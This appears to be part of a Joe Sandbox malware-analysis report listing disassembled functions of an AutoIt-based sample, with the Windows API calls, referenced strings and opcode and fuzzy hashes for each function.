Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: dec74a90d5efe695b4581ed8e128d709181e836a1bcada2a9008946be2837a28
Instruction ID: 911a8386bb007822dd524be908a0fb574d05476123c0be421b851bf49870f28b
Opcode Fuzzy Hash: dec74a90d5efe695b4581ed8e128d709181e836a1bcada2a9008946be2837a28
Instruction Fuzzy Hash: F9F0543A540612EFD7512BA5FC8CADB7729EF4A302B101571F646B10B1DB75A905CB60

Function 00E78E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E78E7F
UnloadUserProfile.USERENV(?,?), ref: 00E78E8B
CloseHandle.KERNEL32(?), ref: 00E78E94
CloseHandle.KERNEL32(?), ref: 00E78E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00E78EA5
HeapFree.KERNEL32(00000000), ref: 00E78EAC

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 9fe24091492faeb2142e4835f80cb80b6612486d7e715536e048b74b9ee30e2c
Instruction ID: 5283ca85ca52af5162e6f7f93c0c1f23bed3ed87cdb8f2f5b34a9ab8ccd6fff8
Opcode Fuzzy Hash: 9fe24091492faeb2142e4835f80cb80b6612486d7e715536e048b74b9ee30e2c
Instruction Fuzzy Hash: C6E0C236104001FFDB011FE2EC0C90ABB69FB9E322B108231F219A1071CB32A429DB50

Function 00E77A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00EB2C7C,?), ref: 00E77C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00EB2C7C,?), ref: 00E77C4A
CLSIDFromProgID.OLE32(?,?,00000000,00EAFB80,000000FF,?,00000000,00000800,00000000,?,00EB2C7C,?), ref: 00E77C6F
_memcmp.LIBCMT ref: 00E77C90

Strings

,,, xrefs: 00E77A85

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,
API String ID: 314563124-1556401989
Opcode ID: f7370fd3d4d5e492024f4c421876ceddcef84de14a4b63f4912685c48f02518e
Instruction ID: 0cc952d15262bcdcff3e084120e2ca4ee4dd6458da456dab9ece5355c15c6366
Opcode Fuzzy Hash: f7370fd3d4d5e492024f4c421876ceddcef84de14a4b63f4912685c48f02518e
Instruction Fuzzy Hash: 7B810B75A00109EFCB05DF94C984EEEB7B9FF89315F208198E556BB250DB71AE06CB60

Function 00E98902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E98928
CharUpperBuffW.USER32(?,?), ref: 00E98A37
VariantClear.OLEAUT32(?), ref: 00E98BAF

Part of subcall function 00E87804: VariantInit.OLEAUT32(00000000), ref: 00E87844
Part of subcall function 00E87804: VariantCopy.OLEAUT32(00000000,?), ref: 00E8784D
Part of subcall function 00E87804: VariantClear.OLEAUT32(00000000), ref: 00E87859

Strings

Incorrect Parameter format, xrefs: 00E98960, 00E98B22
AUTOIT.ERROR, xrefs: 00E98A3D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: d675729c3c99d011d958e4bd0671697ed848d44e722760224b410d01b50d1667
Instruction ID: 50d10623c3714e62f70f269a9ac102a817032962ad8fe781113d0eb10f221b43
Opcode Fuzzy Hash: d675729c3c99d011d958e4bd0671697ed848d44e722760224b410d01b50d1667
Instruction Fuzzy Hash: F291A0756083019FCB10DF24C58195ABBE4FFC9314F04996EF89AAB362DB31E945CB52

Function 00E82F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3FEC6: _wcscpy.LIBCMT ref: 00E3FEE9

_memset.LIBCMT ref: 00E83077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E830A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E83159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E83187

Strings

0, xrefs: 00E83063

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: c271de5f9eaaedba19c0aaec695742d9fadd4b95796021d41f7e35f8da292870
Instruction ID: a525ae33902483829f6fc85127b172aff544606bebc0231490b99ca9f82cb080
Opcode Fuzzy Hash: c271de5f9eaaedba19c0aaec695742d9fadd4b95796021d41f7e35f8da292870
Instruction Fuzzy Hash: 9D51AE3160A3009ED725AF38D849A6BB7E4AF95F64F042A2DF88DF3191DB70CE448752

Function 00E82C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E82CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E82CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00E82D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EE6890,00000000), ref: 00E82D5A

Strings

0, xrefs: 00E82CA4

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: e3cce526eff2f6740bd67e3596c862ccce098e42acc1b42faa270617dce647ec
Instruction ID: 70ead535912b11acf505f14700762bee3a39b726fb6f695337a6ce720e9af2d2
Opcode Fuzzy Hash: e3cce526eff2f6740bd67e3596c862ccce098e42acc1b42faa270617dce647ec
Instruction Fuzzy Hash: 68419F306053019FD724EF24D844B5ABBE8AF85324F145A1DFA6DA72E1D770E904CBA2

Function 00E9DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E9DAD9

Part of subcall function 00E279AB: _memmove.LIBCMT ref: 00E279F9

Strings

winapi, xrefs: 00E9DB4A
cdecl, xrefs: 00E9DB30
none, xrefs: 00E9DBB4
stdcall, xrefs: 00E9DB5B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 7aaf70826907325438553bad6afbf1f43ba680ce6ffcbe607a15881579e0fa40
Instruction ID: 9cce84ccb399771432a98a57c57a223fe88414bde6a942644f2cec752acd0f71
Opcode Fuzzy Hash: 7aaf70826907325438553bad6afbf1f43ba680ce6ffcbe607a15881579e0fa40
Instruction Fuzzy Hash: 3631707190462AEBCF10EF94DC819EEB3F4FF45314B11962AE865B7791DB31A906CB80

Function 00E79372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

Part of subcall function 00E7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E793F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E79409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00E79439

Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

Strings

ListBox, xrefs: 00E793B5
ComboBox, xrefs: 00E79380

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: a32b987bb7c9f3df378759d6ef65ddf77b6132e1ec65660d650f4a513501a4b9
Instruction ID: f01997168350cb5959bad33cbe59d204f0c88cb4fc15cb301856a72cdcb030d5
Opcode Fuzzy Hash: a32b987bb7c9f3df378759d6ef65ddf77b6132e1ec65660d650f4a513501a4b9
Instruction Fuzzy Hash: 44210771900104BFDB14ABB0EC86DFFB7B8DF45350B14A12AF929B72E2DB351D4A9660

Function 00EA6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E21D73
Part of subcall function 00E21D35: GetStockObject.GDI32(00000011), ref: 00E21D87
Part of subcall function 00E21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E21D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EA66D0
LoadLibraryW.KERNEL32(?), ref: 00EA66D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EA66EC
DestroyWindow.USER32(?), ref: 00EA66F4

Strings

SysAnimate32, xrefs: 00EA66AB

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 7651cfba05673f39629f471a8c4c008a55c67f1960179cbd7e651a984f2ae8d6
Instruction ID: cbae2a3cea1dde6e410437a6a627ce35dbccaf6fc8866a944def84ff28abbeec
Opcode Fuzzy Hash: 7651cfba05673f39629f471a8c4c008a55c67f1960179cbd7e651a984f2ae8d6
Instruction Fuzzy Hash: D5218E71100205AFEF104F64EC80EAB77EDEB9F368F196629F911BA190DB71AC519760

Function 00E8703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00E8705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E87091
GetStdHandle.KERNEL32(0000000C), ref: 00E870A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E870DD

Strings

nul, xrefs: 00E870D8

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 6312bae44566bc1f8f83695d62565a0619b8243540be62bc89d24cfb75207c53
Instruction ID: fd83a83b27ac86a6714e7a1295d60bea03edda68abc1654bc852b9ac97f5f10d
Opcode Fuzzy Hash: 6312bae44566bc1f8f83695d62565a0619b8243540be62bc89d24cfb75207c53
Instruction Fuzzy Hash: F0219F74604309ABDF20AF69D804A9A77E8AF55724F305619F9E8E72E0D771E840CB60

Function 00E8710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00E8712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E8715D
GetStdHandle.KERNEL32(000000F6), ref: 00E8716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E871A8

Strings

nul, xrefs: 00E871A3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: aaa1d0f0d6d4bb28556db36f96fe8a3ad5ad318825b98828d517e207fb830355
Instruction ID: 5303f30e660c67d82345042cbaa84215628ffc2ad18cf57cfd76414d3c680dd3
Opcode Fuzzy Hash: aaa1d0f0d6d4bb28556db36f96fe8a3ad5ad318825b98828d517e207fb830355
Instruction Fuzzy Hash: 7521C4716092059BDB20AF699C08A9977E8AF55724F301619FDFCF72E0D770E841C760

Function 00E8AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E8AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E8AF13
__swprintf.LIBCMT ref: 00E8AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,00EAF910), ref: 00E8AF6A

Strings

%lu, xrefs: 00E8AF26

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 635c0de72960bcd41b71a9a47e75861b4288c667b73fb8a9fbeeb6cc1b269e5c
Instruction ID: db2202a6c1a667d8eae55f1e57d3ddc7e40bf19a3b66e4fe6227bdc6617d1f94
Opcode Fuzzy Hash: 635c0de72960bcd41b71a9a47e75861b4288c667b73fb8a9fbeeb6cc1b269e5c
Instruction Fuzzy Hash: 32217730600209AFDB10EF95D985DAE77F8EF49704B105069F909FB252DB31EA45CB21

Function 00E7A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

Part of subcall function 00E7A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E7A399
Part of subcall function 00E7A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E7A3AC
Part of subcall function 00E7A37C: GetCurrentThreadId.KERNEL32 ref: 00E7A3B3
Part of subcall function 00E7A37C: AttachThreadInput.USER32(00000000), ref: 00E7A3BA

GetFocus.USER32 ref: 00E7A554

Part of subcall function 00E7A3C5: GetParent.USER32(?), ref: 00E7A3D3

GetClassNameW.USER32(?,?,00000100), ref: 00E7A59D
EnumChildWindows.USER32(?,00E7A615), ref: 00E7A5C5
__swprintf.LIBCMT ref: 00E7A5DF

Strings

%s%d, xrefs: 00E7A5D9

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: abc67e421dbb1d2d227dd98456ed1b8fdc93a7f20c5ffa8665720fc02c22964b
Instruction ID: 9a864525e169ec853adeefa1b0ecbf85b948a293fa2df8ed0083b3f3f93dcd79
Opcode Fuzzy Hash: abc67e421dbb1d2d227dd98456ed1b8fdc93a7f20c5ffa8665720fc02c22964b
Instruction Fuzzy Hash: C0117271600209BBDF117FA4EC85FEE77B89F89710F089075F91CBA192CA7059458B75

Function 00E82017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00E82048

Strings

APPEND, xrefs: 00E82081
KEYS, xrefs: 00E8205F
EXISTS, xrefs: 00E82070
REMOVE, xrefs: 00E8204E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 6a51299c6b10d52c4d3ef599d1e9eefdfb55519e71161b2751c8d4084dcf4da1
Instruction ID: 940c98852584b54548e90f544ace5a4e0525c3afc54fcde8cf79c0ed3628c12d
Opcode Fuzzy Hash: 6a51299c6b10d52c4d3ef599d1e9eefdfb55519e71161b2751c8d4084dcf4da1
Instruction Fuzzy Hash: 1A113970D0011A8FCF00EFA4E9418EEB7B4FF56304F14A469D959B7352EB326A0ACB50

Function 00E9EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E9EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E9EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E9F07E
CloseHandle.KERNEL32(?), ref: 00E9F0FF

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 382873b64a1ce9d65dffb2874a6c6f18c1d1eea6adda5986b2cfdddb450df805
Instruction ID: 6d1835b09aac74511f80f53efbe23fa695f07c30457699a852f62ba977f844da
Opcode Fuzzy Hash: 382873b64a1ce9d65dffb2874a6c6f18c1d1eea6adda5986b2cfdddb450df805
Instruction Fuzzy Hash: CA8184B16043109FDB20DF25DC46F6AB7E5AF48724F14981DF599EB392DB70AC408B91

Function 00EA02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

Part of subcall function 00EA10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA0038,?,?), ref: 00EA10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA0388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EA03C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EA040E
RegCloseKey.ADVAPI32(?,?), ref: 00EA043A
RegCloseKey.ADVAPI32(00000000), ref: 00EA0447

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 6b0c4286c5569c34783991d2b1aec2efea51beaebf4fec93cc5ca5c4d82349e8
Instruction ID: 9a1db965869513843cc4fc875e84b74260f293f6ef22e1a2d7b478d64b191f02
Opcode Fuzzy Hash: 6b0c4286c5569c34783991d2b1aec2efea51beaebf4fec93cc5ca5c4d82349e8
Instruction Fuzzy Hash: 6B514F71208204AFDB04EF54D881E6EB7E8FF89314F04991DF595AB191DB31E908CB52

Function 00E9DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E9DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 00E9DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 00E9DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 00E9DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E9DD35

